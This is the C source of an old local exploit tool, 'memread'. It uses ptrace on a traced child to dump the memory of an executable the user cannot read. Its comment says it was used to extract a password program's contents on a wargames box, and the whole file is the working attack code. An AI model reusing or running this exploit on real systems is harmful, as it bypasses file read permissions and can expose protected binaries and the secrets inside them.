/*
Program: memread
Program by: lockdown (www.lockeddown.net)

This program exploits a kernel hole lamagra pointed out to me.  If you can execute a program but don't have read permisions you can still read its memory as long as it is not suid or sgid.  I used this program to dump the memory of the password program on drill.hackerslab.org (it was a wargames box)
Don't forget to edit execl().
address		platform	
0x08048000	x86
0x10000000	ppc
*/

#include <stdlib.h>
#include <signal.h>
#include <syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ptrace.h>

int i=0,wait_val,pid;
main()
{
	switch(pid=fork())
	{
		case -1:
			perror("fork");
			exit(1);
		case 0:
			child();
			break;
		default:
			parent();
			break;
	}
}
child()
{
	ptrace(PT_TRACE_ME,getpid(),0,0);
	execl("/bin/pass","pass",NULL);
}
parent()
{
	caddr_t addr;
	char text = 0;
	if(ptrace(PTRACE_SINGLESTEP,pid,0,0) !=0)
		perror("ptrace");
	addr = 0x08048000;
	while(1)
	{
		text = ptrace(PTRACE_PEEKDATA,pid,addr,0);
		printf("%c",text);
		addr+=1;
	}
	if(ptrace(PTRACE_SINGLESTEP,pid,0,0) !=0)
		perror("ptrace");
}